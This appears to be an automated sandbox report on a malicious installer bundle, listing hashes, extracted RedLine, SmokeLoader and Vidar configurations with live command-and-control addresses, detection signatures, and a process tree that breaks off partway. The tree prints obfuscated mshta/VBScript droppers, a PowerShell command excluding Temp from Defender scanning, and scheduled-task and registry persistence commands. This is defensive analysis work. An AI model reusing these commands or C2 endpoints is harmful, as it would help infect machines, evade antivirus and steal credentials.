Resubmissions

13-10-2021 18:35

211013-w8lxmaegdr 10

13-10-2021 12:38

211013-pvkdbadhdm 10

13-10-2021 05:30

211013-f7nrtsdfa3 10

12-10-2021 20:25

211012-y7qwasdbh4 10

11-10-2021 21:02

211011-zvywtaabdq 10

Analysis

  • max time kernel
    98s
  • max time network
    624s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    13-10-2021 18:35

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    26f28bf2dc2b6afc0dd99cb6ea3879b8

  • SHA1

    9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05

  • SHA256

    5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

  • SHA512

    5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Extracted

Family

vidar

Version

41.3

Botnet

937

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    937

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 22 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:60
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:1028
        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
          C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
          2⤵
            PID:7424
          • C:\Users\Admin\AppData\Roaming\fwwiwvc
            C:\Users\Admin\AppData\Roaming\fwwiwvc
            2⤵
              PID:8900
            • C:\Users\Admin\AppData\Roaming\gcwiwvc
              C:\Users\Admin\AppData\Roaming\gcwiwvc
              2⤵
                PID:8920
              • \??\c:\windows\system\svchost.exe
                c:\windows\system\svchost.exe
                2⤵
                  PID:5896
                • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                  C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                  2⤵
                    PID:10024
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1348
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                      1⤵
                        PID:1460
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                        1⤵
                          PID:1916
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                          1⤵
                            PID:2424
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1120
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                              1⤵
                                PID:2436
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                1⤵
                                  PID:2680
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                  1⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2672
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                  1⤵
                                    PID:2876
                                  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:656
                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:3808
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\setup_install.exe
                                        "C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\setup_install.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:2032
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1484
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2376
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2316
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon20762bc3f6.exe
                                            Mon20762bc3f6.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3156
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3152
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon206b909958ed4.exe
                                            Mon206b909958ed4.exe /mixone
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3112
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 660
                                              6⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4884
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 676
                                              6⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4984
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 632
                                              6⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4424
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 676
                                              6⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4748
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 848
                                              6⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1496
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 900
                                              6⤵
                                              • Program crash
                                              PID:5924
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1068
                                              6⤵
                                              • Program crash
                                              PID:2504
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1264
                                              6⤵
                                              • Program crash
                                              PID:6428
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1304
                                              6⤵
                                              • Program crash
                                              PID:6520
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1436
                                              6⤵
                                              • Program crash
                                              PID:6788
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1428
                                              6⤵
                                              • Program crash
                                              PID:6876
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
                                          4⤵
                                            PID:1524
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon20927aab1e5.exe
                                              Mon20927aab1e5.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3896
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon20927aab1e5.exe
                                                C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon20927aab1e5.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4428
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1624
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon204014f13870f5e.exe
                                              Mon204014f13870f5e.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious behavior: MapViewOfSection
                                              PID:3604
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1872
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe
                                              Mon203f01ac7e6.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3792
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                6⤵
                                                  PID:2488
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"
                                                    7⤵
                                                      PID:6040
                                                      • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                        09xU.EXE -pPtzyIkqLZoCarb5ew
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        PID:5476
                                                        • C:\Windows\svchost.com
                                                          "C:\Windows\svchost.com" "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                          9⤵
                                                            PID:6560
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              C:\Windows\System32\mshta.exe VbsCRiPT: cLosE (CrEaTeOBJeCt ( WScrIPT.SheLL ).RuN ( CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" , 0 , tRUe) )
                                                              10⤵
                                                                PID:6572
                                                            • C:\Windows\svchost.com
                                                              "C:\Windows\svchost.com" "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                              9⤵
                                                                PID:6084
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  C:\Windows\System32\mshta.exe vbScRipT: cloSE ( creAteobjECT ( WscriPT.SHell ). RuN ( cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I , 0 ,TRuE ) )
                                                                  10⤵
                                                                    PID:5100
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /F -Im "Mon203f01ac7e6.exe"
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:5948
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:1924
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon206d48916f93c5.exe
                                                          Mon206d48916f93c5.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:2956
                                                          • C:\Users\Admin\AppData\Roaming\3870284.scr
                                                            "C:\Users\Admin\AppData\Roaming\3870284.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3680
                                                          • C:\Users\Admin\AppData\Roaming\8921849.scr
                                                            "C:\Users\Admin\AppData\Roaming\8921849.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            PID:4140
                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4688
                                                          • C:\Users\Admin\AppData\Roaming\3486942.scr
                                                            "C:\Users\Admin\AppData\Roaming\3486942.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4272
                                                          • C:\Users\Admin\AppData\Roaming\4350152.scr
                                                            "C:\Users\Admin\AppData\Roaming\4350152.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:656
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3616
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon209c830507d573.exe
                                                          Mon209c830507d573.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:1888
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon209c830507d573.exe
                                                            C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon209c830507d573.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4436
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon209c830507d573.exe
                                                            C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon209c830507d573.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4960
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe
                                                        4⤵
                                                          PID:1252
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon2083f8d8970a0b2d.exe
                                                            Mon2083f8d8970a0b2d.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3168
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe
                                                          4⤵
                                                            PID:2232
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon209b3da1556b9a317.exe
                                                              Mon209b3da1556b9a317.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3888
                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:3808
                                                                • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:3184
                                                                • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:416
                                                                  • C:\Users\Admin\AppData\Roaming\1149201.scr
                                                                    "C:\Users\Admin\AppData\Roaming\1149201.scr" /S
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4812
                                                                  • C:\Users\Admin\AppData\Roaming\8041176.scr
                                                                    "C:\Users\Admin\AppData\Roaming\8041176.scr" /S
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1324
                                                                  • C:\Users\Admin\AppData\Roaming\2859411.scr
                                                                    "C:\Users\Admin\AppData\Roaming\2859411.scr" /S
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4344
                                                                  • C:\Users\Admin\AppData\Roaming\3444315.scr
                                                                    "C:\Users\Admin\AppData\Roaming\3444315.scr" /S
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: SetClipboardViewer
                                                                    PID:3560
                                                                  • C:\Users\Admin\AppData\Roaming\4508462.scr
                                                                    "C:\Users\Admin\AppData\Roaming\4508462.scr" /S
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3436
                                                                • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4160
                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4704
                                                                    • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      PID:3660
                                                                      • C:\Windows\svchost.com
                                                                        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                        10⤵
                                                                          PID:2064
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\System32\cmd.exe /C REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                            11⤵
                                                                              PID:5408
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                                12⤵
                                                                                • Modifies registry key
                                                                                PID:6528
                                                                          • C:\Windows\svchost.com
                                                                            "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
                                                                            10⤵
                                                                              PID:6788
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe /F
                                                                                11⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:4192
                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:4296
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-HAQGA.tmp\setup.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-HAQGA.tmp\setup.tmp" /SL5="$10200,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:4608
                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            PID:4932
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LVPA6.tmp\setup.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LVPA6.tmp\setup.tmp" /SL5="$20214,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                              10⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Drops file in Program Files directory
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:5104
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OBKB1.tmp\postback.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-OBKB1.tmp\postback.exe" ss1
                                                                                11⤵
                                                                                  PID:5876
                                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                          7⤵
                                                                            PID:4388
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                              8⤵
                                                                                PID:5928
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                  9⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:5556
                                                                              • C:\Windows\svchost.com
                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\SERVIC~1.EXE"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Drops file in Windows directory
                                                                                PID:5600
                                                                                • C:\Users\Admin\AppData\Roaming\SERVIC~1.EXE
                                                                                  C:\Users\Admin\AppData\Roaming\SERVIC~1.EXE
                                                                                  9⤵
                                                                                    PID:6156
                                                                                    • C:\Windows\svchost.com
                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                      10⤵
                                                                                        PID:5080
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn services64 /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                          11⤵
                                                                                            PID:7044
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /sc onlogon /rl highest /tn services64 /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                              12⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4628
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
